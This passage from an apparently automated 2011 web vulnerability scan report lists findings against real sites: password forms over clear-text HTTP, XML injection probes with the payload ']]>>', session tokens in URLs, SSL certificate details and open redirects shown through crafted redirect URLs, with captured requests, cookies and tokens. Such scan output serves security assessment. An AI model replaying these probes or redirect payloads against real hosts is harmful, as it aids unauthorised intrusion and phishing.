The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /Chat.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/DailyOmni.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.8.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:02:42 GMT
Content-Length: 20808

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts are
...[SNIP]...
</script>
<form name="form2" method="post" action="Chat.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

6.9. http://www.livewithoscar.com/DailyOmni.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /DailyOmni.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /DailyOmni.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.2.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:23 GMT
Content-Length: 44997

<!-- All visible symbols and logos are Trademarks and Copyrights of LiveWithOscar.com ..TM 2006 - 2010 All Rights Reserved. -->
<!-- Site design, development databases and all supporting scripts ar
...[SNIP]...
</script>
<form name="form2" method="post" action="DailyOmni.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

6.10. http://www.livewithoscar.com/FlashIframe.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.livewithoscar.com
Path:   /FlashIframe.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /FlashIframe.aspx HTTP/1.1
Host: www.livewithoscar.com
Proxy-Connection: keep-alive
Referer: http://www.livewithoscar.com/optout.aspx?u=1211&token=479e20863458d05ef0fb482e950827b9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=e4xtb3450tzjui45gtnyv055; __utmz=1.1308052841.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.463457183.1308052841.1308052841.1308052841.1; __utmc=1; __utmb=1.1.10.1308052841

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 12:01:07 GMT
Content-Length: 13776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta id="RefreshPer
...[SNIP]...
</script>
<form name="form2" method="post" action="FlashIframe.aspx" id="form2">
<div>
...[SNIP]...
<br /><input name="txtPassword" type="password" id="txtPassword" /><br />
...[SNIP]...

7. XML injection  previous  next
There are 4 instances of this issue:

Issue background

XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.

This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.

Issue remediation

The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: &lt; and &gt;.


7.1. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/follow_button.html?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 295
Date: Tue, 14 Jun 2011 00:14:01 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets]]&gt;&gt;/follow_button.html</Key><RequestId>7A323588EB26C97F</Requ
...[SNIP]...

7.2. http://platform.twitter.com/widgets/follow_button.html [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets/follow_button.html]]>>?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 404 Not Found
Content-Type: application/xml
Content-Length: 295
Date: Tue, 14 Jun 2011 00:14:04 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Key>widgets/follow_button.html]]&gt;&gt;</Key><RequestId>3B85B8189F04A81E</Requ
...[SNIP]...

7.3. http://r.nexac.com/e/getdata.xgi [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /e]]>>/getdata.xgi?dt=br&pkey=kdii33k3nlxia&ru=http%3A%2F%2Fpix04.revsci.net%2FD08734%2Fa1%2F0%2F3%2F0.js%3FD%3DDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D%3Cna_da%3E%252526naid%25253D%3Cna_id%3E%252526namp%25253D%3Cna_mp%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Tue, 14 Jun 2011 00:14:15 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

7.4. http://r.nexac.com/e/getdata.xgi [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /e/getdata.xgi]]>>?dt=br&pkey=kdii33k3nlxia&ru=http%3A%2F%2Fpix04.revsci.net%2FD08734%2Fa1%2F0%2F3%2F0.js%3FD%3DDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D%3Cna_da%3E%252526naid%25253D%3Cna_id%3E%252526namp%25253D%3Cna_mp%3E HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 404 Not Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Content-Type: text/html
Content-Length: 345
Date: Tue, 14 Jun 2011 00:14:16 GMT
Server: lighttpd/1.4.18

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8. Session token in URL  previous  next
There are 2 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


8.1. http://pixel.alexametrics.com/atrk.gif  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://pixel.alexametrics.com
Path:   /atrk.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /atrk.gif?random_number=13442793427&jsv=20090615&user_cookie=8a1417a21308b8c7cc21f56479b&user_cookie_flag=1&sess_cookie=8a1417a21308b8c7cc21f56479b&sess_cookie_flag=1&host_url=http%3A%2F%2Fwww.alexa.com%2F&ref_url=&cookie_enabled=1&java_enabled=1&screen_params=1920x1200x32&flashver=10.3.181&time=1308011297988&time_zone_offset=300&title=Alexa%20the%20Web%20Information%20Company&domain=alexa.com&label=home&account=s3LE913x9k00WW HTTP/1.1
Host: pixel.alexametrics.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: lmHgGpu5SwPHhUUBdI1jpDyd/Ui6DI/aW6ImgDlWJVtPnCrayfTKY/P7gzpq86od
x-amz-request-id: EE6A63A80097A9E8
Date: Fri, 13 May 2011 12:53:46 GMT
x-amz-meta-alexa-last-modified: 20110117123941
Last-Modified: Mon, 17 Jan 2011 20:41:40 GMT
ETag: "221d8352905f2c38b3cb2bd191d630b0"
Accept-Ranges: bytes
Content-Type: image/gif
Content-Length: 43
Server: AmazonS3
Age: 70459
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 564a64f1818853969657bce8dfc50ec6c5ec134108ef42980a20660d202595fa1c91c37f35e03ab6
Via: 1.0 c662f4e5a3bc7b224ce1bbecb0a23d82.cloudfront.net:11180 (CloudFront), 1.0 f633d3d099dda5545ae196d0f3869b62.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

GIF89a.............!.......,...........D..;

8.2. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=67fc5e01d68cf35eba52297f5bf2ed3d&app_id=67fc5e01d68cf35eba52297f5bf2ed3d&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df26ad6e48%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df282e93c28%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6e479cc%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df103fe2ee%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df664004d4%26origin%3Dhttp%253A%252F%252Fonline.wsj.com%252Ff2bfe1068%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df37019a21c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.100.34
X-Cnection: close
Date: Tue, 14 Jun 2011 00:13:56 GMT
Content-Length: 238

<script type="text/javascript">
parent.postMessage("cb=f103fe2ee&origin=http\u00253A\u00252F\u00252Fonline.wsj.com\u00252Ff2bfe1068&relation=parent&transport=postmessage&frame=f37019a21c", "http:\/\/o
...[SNIP]...

9. SSL certificate  previous  next
There are 6 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://login.yahoo.com/  previous  next

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:The server presented the following certificates:

Server certificate

Issued to:  login.yahoo.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Mon Dec 20 18:00:00 CST 2010
Valid to:  Thu Jan 03 17:59:59 CST 2013

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Jan 13 13:20:32 CST 2010
Valid to:  Wed Sep 30 13:19:47 CDT 2015

Certificate chain #3

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

9.2. https://buy.wsj.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.wsj.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  buy.wsj.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Wed Oct 06 19:00:00 CDT 2010
Valid to:  Sun Oct 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

9.3. https://edit.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  edit.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed May 19 03:54:49 CDT 2010
Valid to:  Wed Jun 19 17:41:46 CDT 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

9.4. https://en.wordpress.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://en.wordpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.wordpress.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Oct 14 06:29:26 CDT 2010
Valid to:  Wed Oct 14 06:29:26 CDT 2015

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

9.5. https://login21.marketingsolutions.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login21.marketingsolutions.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.marketingsolutions.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Wed Aug 23 12:36:40 CDT 2006
Valid to:  Tue Aug 23 12:36:40 CDT 2011

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

9.6. https://marketingsolutions.login.yahoo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://marketingsolutions.login.yahoo.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  marketingsolutions.login.yahoo.com
Issued by:  Equifax Secure Certificate Authority
Valid from:  Fri Feb 01 17:41:33 CST 2008
Valid to:  Thu Jan 31 17:41:33 CST 2013

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

10. Open redirection  previous  next
There are 2 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into redirection targets. In many cases, this behaviour can be avoided in two ways:If it is considered unavoidable for the redirection function to receive user-controllable input and incorporate this into the redirection target, one of the following measures should be used to minimize the risk of redirection attacks:


10.1. http://b.scorecardresearch.com/r [d.c parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The value of the d.c request parameter is used to perform an HTTP redirect. The payload http%3a//a54e375280e0c6b5c/a%3fgif was submitted in the d.c parameter. This caused a redirection to the following URL:

Request

GET /r?c2=6035148&d.c=http%3a//a54e375280e0c6b5c/a%3fgif&d.o=djglobal&d.x=252794533&d.t=page&d.u=http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Fnews-tech-technology.html%3Frefresh%3Don HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=64dfc632-184.84.247.65-1305305561

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://a54e375280e0c6b5c/a?gif
Date: Tue, 14 Jun 2011 00:13:57 GMT
Connection: close
Set-Cookie: UID=64dfc632-184.84.247.65-1305305561; expires=Thu, 13-Jun-2013 00:13:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.2. http://r.nexac.com/e/getdata.xgi [ru parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//a7f01869e5f0330bd/a%3fhttp%3a//pix04.revsci.net/D08734/a1/0/3/0.js%3fD%3dDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D<na_da>%252526naid%25253D<na_id>%252526namp%25253D<na_mp> was submitted in the ru parameter. This caused a redirection to the following URL:

Request

GET /e/getdata.xgi?dt=br&pkey=kdii33k3nlxia&ru=http%3a//a7f01869e5f0330bd/a%3fhttp%3a//pix04.revsci.net/D08734/a1/0/3/0.js%3fD%3dDM_LOC%253Dhttp%25253A%25252F%25252Fna.com%25253Fnada%25253D<na_da>%252526naid%25253D<na_id>%252526namp%25253D<na_mp> HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_id=2011051519270862126421219180; na_ps=3; OAX=rcHW803foR4AB3jk; na_tc=Y

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Location: http://a7f01869e5f0330bd/a?http://pix04.revsci.net/D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fna.com%253Fnada%253D%2526naid%253D2011051519270862126421219180%2526namp%253D
Content-type: text/html
Date: Tue, 14 Jun 2011 00:14:02 GMT
Server: lighttpd/1.4.18
Content-Length: 1



11. Cookie scoped to parent domain  previous  next
There are 48 instances of this issue:

Issue background

